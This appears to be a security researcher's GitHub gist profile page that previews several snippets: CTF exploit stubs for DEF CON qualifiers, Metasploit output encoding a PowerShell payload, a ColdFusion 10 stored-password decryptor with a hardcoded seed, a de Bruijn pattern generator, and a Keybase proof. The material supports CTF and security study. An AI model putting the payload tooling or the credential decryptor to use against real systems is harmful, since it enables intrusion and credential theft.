Ditmar Wendt dwendt
dwendt /
Last active May 14, 2018
dc18 quals, all the good parts of this code belong to jeffball
```python
from pwn import *
from pow import solve_pow
#from network_util import *
import struct
#fd = open("m68k.bin", "r")
#shellcode =
def p32(v):
    # big-endian signed 32-bit pack for the m68k target (shadows pwntools' p32)
    return struct.pack(">i", v)
```
View welp.txt
```text
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of cmd/powershell_base64
cmd/powershell_base64 succeeded with size 333 (iteration=0)
cmd/powershell_base64 chosen with final size 333
Payload size: 333 bytes
Final size of psh file: 2374 bytes
$NHEpDZWJXk = @"
```
View coldfusion10decrypt.rb
```ruby
require 'openssl'
require 'base64'
require 'rexml/document'
include REXML
# pull this from
SEED = 'EB3452127614E25A'
def decrypt(cpass)
```
View coldfusion10decrypt.rb
```ruby
require 'openssl'
require 'base64'
SEED = 'EB3452127614E25A'
strings = ["TWMQJJtbRUD5FJur/SuWmW53rumcHkzZGS6TqK3CTvM=", "ZGG8VSEQSeJL45huJFIl3oLX0UE5tVlchKvXsGdYprQ=", "HybRUpUK8tXT0++qaOX+vNYYclDJsx2gBfLFc8j8N34=", "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="]
encryptedString = "g4YT2OoY8qIG0M7BzrKI7CJMwv2KzVFBlAuSsZByErA="
def decrypt(cpass)
```

Keybase proof

I hereby claim:

  • I am dwendt on github.
  • I am dwn on keybase.
  • I have a public key ASBWYRBdrYcszXAvxjy6REZ4jFQx7DGWnvfF0slVL9T_9Ao

To claim this, I am signing this object:

dwendt / gist:c25895fde82730b8f17f
Created Mar 25, 2016
SunCTF scores that CTFTime won't accept
View gist:c25895fde82730b8f17f
```json
"standings": [
  "id": 393,
  "pos": 1,
  "score": 1905,
  "team": "eipiplus1equals0"
  "id": 135,
```
dwendt /
Created Jul 16, 2015

LegitBS Quals 2015 - thing2 (4pts)

For this pwnable we've got a zip with AppJailLauncher.exe and thing2.exe. This means we get to experience the wonders of ASLR+DEP+Win8.1 🔥 tl;dr ruby solution

Prerequisite Knowledge

  • C++ Object Memory Layout (Virtual Function Tables)
  • Windows 64-bit ABI / Calling Convention
  • ROP
View gist:5cc5223d4686d0e33209
```javascript
var memoArr = {}; // cache of previously generated sequences, keyed by length
var charset = "A%sB$nC-(D;)Ea0Fb1Gc2Hd3Ie4Jf5Kg6Lh7Mi8Nj9OkPlQmRnSoTpUqVrWsXtYuZvwxyz"; // default gdb-peda charset
function deBruijn (charset, maxlen, n) {
    var k = charset.length;
    var a = [];
    for (var i = 0; i < k * n; i++) a.push(0);
    if (maxlen.toString() in memoArr)
        return memoArr[maxlen.toString()];
    for (var k in memoArr) {
```
dwendt / thing2.exe.rb
Created Jun 10, 2015
thing2.exe - legitbs defcon quals 2015 - 4pt pwnable
View thing2.exe.rb
```ruby
#!/usr/bin/env ruby
require 'socket'
#require 'hexdump'
$dbg = false
$sock = TCPSocket.new("localhost", 4141)
# read from the socket until the marker string appears or the peer closes
def recv_until(str)
  data = ""
  while tmp = $sock.recv(1024) and not tmp.empty?
    data << tmp
    break if data.include?(str)
  end
  data
end
```